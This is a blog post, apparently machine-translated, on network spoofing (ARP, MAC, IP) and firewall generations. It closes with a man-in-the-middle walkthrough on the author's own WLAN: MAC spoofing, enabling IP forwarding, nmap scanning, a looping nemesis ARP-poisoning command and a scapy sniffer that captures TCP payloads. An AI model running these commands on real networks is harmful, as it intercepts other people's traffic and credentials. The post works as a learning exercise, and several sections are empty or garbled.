cheating on the internet

Posted by tzul at 2020-04-13

First of all, let's be popular with Wikipedia. Then try to carry out a man in the middle attack.

theoretical basis

Understand the hierarchical architecture of computer network.

Accustomed to actively using search engines to find knowledge

The following is from Wikipedia

Arp Spoofing

It is a technology that attackers send forged ARP messages on LAN. It is usually to associate the IP address of another host with the MAC address of the attacker. Direct traffic from that host's IP address to the attacker.

ARP Spoofing allows attackers to intercept data frames on a local area network (LAN), change traffic, or block traffic. It is usually used as the beginning of other attacks such as denial of service (DOS), man in the middle (mitm) or session hijacking.

The attack is limited to the LAN using ARP protocol.

LAN communication needs to transform IP address of network layer into MAC address of data link layer to transmit in data link layer. When you know the IP address of a host, you need to obtain its MAC address (arpequest) through a broadcast. This host response (ARP reply) contains the MAC address of this IP.

The ARP protocol has no state, and the host will automatically cache any ARP replies they receive, regardless of whether they have requested them or not. Even if there is no expired ARP cache, it will be overwritten by the new ARP response. The host could not authenticate the source of the package.

Generally, an ARP attack may come from the compromised machine or directly from the attacker's host. Generally, the target of the attack is to associate the MAC address of the attacker with the IP address of the target machine, which means that the traffic sent to the target is sent to the attacker. Attackers can:

The defensive measures include:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, ArpCacheLife, ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute, ArpRetryCount

Mac Spoofing

It is a technology to change the MAC (media access control) address of an interface on a network device. The MAC address is hard coded into the network interface controller and cannot be changed. However, there is a way to make the operating system believe that the network card uses the MAC address specified by the user. Usually this changes the identity of a computer, but it's quite simple.

Usually in order to bypass the server or router access control list, or hide a computer or pretend to be other network devices. Sometimes it's legal, sometimes it's illegal.

Mac spoofing hosts can usually receive information (some special security switch configurations can prevent the transmission of such packets). However, MAC address forgery is limited to the local broadcast domain.

IP Spoofing

It is a kind of behavior that forges the source address in IP packets. One is to hide the identity of forgers, the other is to pretend to be other machines.

By changing the source address segment of IP packet header, the attacker makes it appear that it comes from other machines. The machine that receives the fake package returns the package to the wrong machine. Usually attackers don't care about the returned packets, or they can reliably detect the response.

Under certain circumstances, an attacker may be able to see or redirect packets to his own machine. This often happens on local area network or local wireless LAN.

IP spoofing is often used for DoS attacks, because packets come from different addresses, which makes filtering difficult. This makes IP based defense no longer effective. Backscatter is a statistical technique based on invalid address packets, but more complex attacks can also avoid invalid addresses.

IP spoofing is also used to bypass IP based authentication. Although this method can change thousands of packets at a time to make it very difficult to implement when attacking remote systems, it is very effective between trusted intranet machines.

IP spoofing is sometimes used as a website performance test.

Services vulnerable to IP spoofing are:

Defense mode

Email Spoofing

Later, in fact, I thought of this when the GIT server we built on the intranet sent me an email and received it.

URL Spoofing

Let's talk about it later. I think of the dirty flow URL hacking on the dark cloud.


From the perspective of development history, firewall development can be divided into three generations:

Packet filtering. This generation of firewalls only filters individual packets. If a matching rule is found, the packet is discarded (dropped quietly) or rejected (returned error). Usually these rules are packet source address, destination address, protocol, and ports such as for TCP and UDP. It has no information about the connection and is stateless.

This generation firewall mainly works in the next three layers and slightly peeks at the source and destination addresses and ports of the transport layer.

Stateful filtering. It not only has the function of the first generation firewall, but also works on the OSI layer 4 transport layer. It will take the connection status as an evaluation standard. It remains until it accepts enough packets to determine its connection state. It records all connections that have passed and determines whether a package is the beginning of a new connection or part of an existing connection or not.


The application level firewall works in the application layer. It can understand the upper layer protocol, so it can detect whether an illegal protocol is trying to cross the firewall through a legal port. The legendary next generation firewall (NGFW) is to extend and deepen the inspection of application layer stack.

The firewall can be classified according to the location where the communication is intercepted and the status tracked:

The network layer or packet filtering mainly works in the TCP / IP layer of the relative bottom layer, relying on rule filtering. There are two kinds:

Stateful: stores the current connection phase, source and destination address port. If a package does not belong to an existing connection, evaluate it by rules of the new connection. If a package belongs to a known connection, it will be processed as the connection

Stateless. Need less memory, faster. Suitable for handling Connectionless Protocols. However, complex decisions cannot be made based on communication state. An example is iptables

Application layer firewall: intercepts interprocess communication through socket, and uses various rules to filter. Unable to resist the underlying vulnerability mining, is being replaced by a mandatory access control (MAC) application firewall, namely sandbox.

Agent: whether it is dedicated hardware or software, it works by responding to the input package in an application way. A proxy server is a gateway from one network to another specific network application, acting on behalf of users in the network. The proxy server makes the internal network and the external network more completely isolated, but the attacker can also attack the internal network by using a machine as a proxy.

Nat -- network address translation: firewalls usually have these functions, and the machines behind firewalls usually have private IP addresses. Originally used to alleviate the crisis of insufficient use of IPv4 address, it has unexpectedly become an important defense means of anti network investigation.

Rogue DHCP

Forged DHCP server, temporarily omitted.

DNS series

Put it in DNS

Next, try a man in the middle attack. I open my mobile phone and notebook in WLAN.

0.0) mac spoofing

sudo ip link set eth0 down sudo ip link set dev eth0 address 38:AA:3C:E6:FE:69 ip link set eth0 up

0.1) preparation

ifconfig wlan0 promisc echo 1 > /proc/sys/net/ipv4/ip_forward

1) Search for

sudo nmap -sS

2) ARP attack

while true do sudo nemesis arp -v -r -d wlan0 -S -D -h E8:39:DF:08:F4:FB -m EC:88:8F:B4:D6:68 -H E8:39:DF:08:F4:FB -M EC:88:8F:B4:D6:68 sudo nemesis arp -v -r -d wlan0 -S -D -h E8:39:DF:08:F4:FB -m 68:5D:43:2E:AA:59 -H E8:39:DF:08:F4:FB -M 68:5D:43:2E:AA:59 done

3) monitoring

pkts = sniff(filter=”tcp and host”,iface=”wlan0”, prn=lambda x: sprintf(“{IP:%IP.src% -\> %IP.dst%\\n}{Raw:%Raw.load%\\n}”))